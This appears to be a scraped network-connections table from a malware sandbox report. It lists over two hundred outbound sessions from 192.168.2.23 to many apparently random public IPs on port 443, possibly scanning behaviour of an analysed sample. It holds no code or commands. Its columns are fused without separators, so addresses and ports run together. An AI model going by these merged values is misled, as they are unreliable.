                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9919192.168.2.2355314192.84.72.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9920192.168.2.23566302.175.42.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9921192.168.2.235797288.41.78.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9922192.168.2.2340802187.79.148.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9923192.168.2.235348036.205.200.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9924192.168.2.2353366111.23.82.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9925192.168.2.2360256212.73.11.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9926192.168.2.2344430145.93.227.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9927192.168.2.2354510148.242.233.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9928192.168.2.2347810123.7.171.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9929192.168.2.2343190206.200.30.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9930192.168.2.234206081.216.35.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9931192.168.2.2343758144.190.214.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9932192.168.2.233751260.45.150.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9933192.168.2.233926469.137.179.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9934192.168.2.235054487.86.145.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9935192.168.2.2334322197.38.143.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9936192.168.2.234100475.191.9.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9937192.168.2.235624269.43.95.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9938192.168.2.233695653.42.8.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9939192.168.2.233622259.185.92.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9940192.168.2.235342477.22.241.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9941192.168.2.233893276.9.70.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9942192.168.2.233703870.86.143.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9943192.168.2.2348536197.196.1.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9944192.168.2.2338042163.148.9.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9945192.168.2.2352610184.12.224.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9946192.168.2.2332828112.156.225.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9947192.168.2.235518086.39.52.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9948192.168.2.2337094210.13.45.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9949192.168.2.233448290.197.71.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9950192.168.2.2348820145.40.151.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9951192.168.2.2337368105.22.194.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9952192.168.2.2347166191.84.177.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9953192.168.2.235438634.27.163.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9954192.168.2.234403060.167.234.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9955192.168.2.235340479.252.97.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9956192.168.2.2341320169.86.92.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9957192.168.2.235321069.244.253.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9958192.168.2.2334700195.163.17.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9959192.168.2.235700274.144.181.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9960192.168.2.2341138202.58.99.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9961192.168.2.233485427.75.15.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9962192.168.2.2352846194.16.97.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9963192.168.2.2359544188.74.171.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9964192.168.2.23598345.75.231.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9965192.168.2.2359380149.253.223.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9966192.168.2.2346968131.129.131.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9967192.168.2.2352304178.37.165.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9968192.168.2.2337444136.18.85.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9969192.168.2.2358148153.239.99.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9970192.168.2.2340490138.242.247.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9971192.168.2.234664874.212.97.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9972192.168.2.233474864.78.143.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9973192.168.2.233924837.80.221.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9974192.168.2.23474501.221.139.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9975192.168.2.2343812157.178.87.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9976192.168.2.2341424132.35.103.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9977192.168.2.2360300204.28.47.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9978192.168.2.2341590134.130.38.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9979192.168.2.2340120155.218.145.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9980192.168.2.2343160110.247.236.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9981192.168.2.2350510175.139.88.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9982192.168.2.234677834.2.59.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9983192.168.2.2355706157.74.45.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9984192.168.2.23378228.25.144.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9985192.168.2.235039238.25.145.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9986192.168.2.2342618142.197.140.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9987192.168.2.2356300172.32.76.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9988192.168.2.235678846.58.113.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9989192.168.2.233774499.205.79.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9990192.168.2.2351824200.245.208.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9991192.168.2.233486218.64.50.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9992192.168.2.2350174167.24.103.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9993192.168.2.2353608221.11.60.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9994192.168.2.2339896174.245.22.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9995192.168.2.235437860.84.140.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9996192.168.2.2348160192.246.89.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9997192.168.2.235615835.66.221.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9998192.168.2.2341350184.236.210.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9999192.168.2.2334600202.206.154.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10000192.168.2.234448080.31.229.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10001192.168.2.2358604118.199.209.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10002192.168.2.2333604151.59.213.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10003192.168.2.234246018.136.199.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10004192.168.2.235217239.101.60.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10005192.168.2.2360680138.135.98.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10006192.168.2.2343140123.200.94.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10007192.168.2.233714042.234.18.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10008192.168.2.2356716106.115.128.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10009192.168.2.2355730189.135.231.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10010192.168.2.234254220.103.233.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10011192.168.2.2350648166.188.252.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10012192.168.2.234330443.52.205.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10013192.168.2.2350392167.16.115.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10014192.168.2.2348712114.202.183.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10015192.168.2.235424843.163.155.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10016192.168.2.234272435.30.20.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10017192.168.2.2352024177.43.141.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10018192.168.2.233895882.81.244.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10019192.168.2.2343890105.176.20.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10020192.168.2.235721850.15.66.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10021192.168.2.2337836219.175.159.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10022192.168.2.2348030173.160.17.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10023192.168.2.235834881.50.255.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10024192.168.2.2349074113.116.130.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10025192.168.2.2347746132.188.80.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10026192.168.2.235677031.12.46.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10027192.168.2.2342840211.81.103.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10028192.168.2.235871453.126.228.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10029192.168.2.2333504124.7.58.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10030192.168.2.234830097.196.236.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10031192.168.2.2334648137.174.84.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10032192.168.2.234272253.114.90.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10033192.168.2.2335220192.83.59.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10034192.168.2.235778889.66.55.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10035192.168.2.234657083.177.73.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10036192.168.2.2357468130.119.243.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10037192.168.2.234214819.21.73.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10038192.168.2.2353522140.26.58.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10039192.168.2.234470488.207.155.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10040192.168.2.235318298.158.89.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10041192.168.2.235196483.244.18.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10042192.168.2.2335352102.32.224.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10043192.168.2.2356898158.43.121.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10044192.168.2.233780480.173.96.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10045192.168.2.2350106204.179.253.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10046192.168.2.235260617.155.114.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10047192.168.2.2345532221.233.25.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10048192.168.2.2358050119.30.72.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10049192.168.2.2360154111.248.251.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10050192.168.2.235190670.103.54.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10051192.168.2.234193873.6.118.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10052192.168.2.235748886.116.220.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10053192.168.2.2343280202.198.36.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10054192.168.2.2351444196.42.137.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10055192.168.2.2353616223.34.191.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10056192.168.2.2337810180.178.202.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10057192.168.2.2356300199.124.127.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10058192.168.2.2338936139.250.73.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10059192.168.2.2355144189.113.121.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10060192.168.2.2354924105.35.252.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10061192.168.2.236035013.185.131.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10062192.168.2.2333358130.88.221.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10063192.168.2.2342530147.170.254.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10064192.168.2.234910285.200.40.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10065192.168.2.235164884.233.255.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10066192.168.2.2357000174.23.38.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10067192.168.2.234473818.94.86.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10068192.168.2.233724896.236.196.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10069192.168.2.2343936194.249.185.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10070192.168.2.2345046184.91.64.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10071192.168.2.2345942168.12.180.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10072192.168.2.2341490189.52.90.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10073192.168.2.235990248.38.41.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10074192.168.2.2360388173.253.131.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10075192.168.2.2337430185.52.3.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10076192.168.2.234220896.251.146.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10077192.168.2.2356032133.175.30.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10078192.168.2.236048632.226.11.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10079192.168.2.2345346100.225.47.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10080192.168.2.234327298.94.1.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10081192.168.2.2351076192.242.204.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10082192.168.2.2350870195.132.201.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10083192.168.2.2337500176.203.68.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10084192.168.2.2351024209.64.21.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10085192.168.2.234138488.109.171.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10086192.168.2.2337596139.129.107.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10087192.168.2.2345778176.12.115.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10088192.168.2.236080459.225.75.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10089192.168.2.235298891.130.14.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10090192.168.2.2346224129.114.66.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10091192.168.2.2343546120.83.103.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10092192.168.2.235456689.234.239.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10093192.168.2.2347038106.139.126.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10094192.168.2.2358780196.123.193.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10095192.168.2.2339646160.158.146.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10096192.168.2.2338386165.11.176.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10097192.168.2.233564275.120.61.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10098192.168.2.2346546218.189.233.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10099192.168.2.234771637.49.33.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10100192.168.2.2352986198.8.41.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10101192.168.2.2353506104.167.57.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10102192.168.2.233484444.174.144.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10103192.168.2.2334650182.124.202.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10104192.168.2.2340078180.255.203.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10105192.168.2.23591584.36.81.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10106192.168.2.2353416205.56.249.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10107192.168.2.2355064114.65.124.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10108192.168.2.2347550173.72.234.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10109192.168.2.235971032.138.243.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10110192.168.2.2358580112.237.250.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10111192.168.2.2333852130.139.123.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10112192.168.2.2343482172.214.200.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10113192.168.2.2341188217.157.19.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10114192.168.2.233494450.196.96.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10115192.168.2.235228295.67.242.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10116192.168.2.2340220159.58.111.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10117192.168.2.23512522.124.55.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10118192.168.2.2346622142.225.42.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10119192.168.2.2344550140.106.5.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10120192.168.2.234782444.153.197.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10121192.168.2.2360424126.129.81.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10122192.168.2.2349054182.87.111.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10123192.168.2.234586065.175.238.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10124192.168.2.2349664218.25.64.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10125192.168.2.234155468.139.186.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10126192.168.2.2343380152.66.65.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10127192.168.2.2359570141.164.156.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10128192.168.2.2353700140.157.243.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10129192.168.2.2339568209.211.192.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10130192.168.2.236020073.66.79.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10131192.168.2.234299235.63.153.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10132192.168.2.2351224109.158.5.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10133192.168.2.235269889.221.26.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10134192.168.2.2360848141.143.112.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10135192.168.2.233589473.203.195.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10136192.168.2.236064262.3.253.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10137192.168.2.2338058180.8.155.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10138192.168.2.2359254219.73.100.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10139192.168.2.2356816200.222.177.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
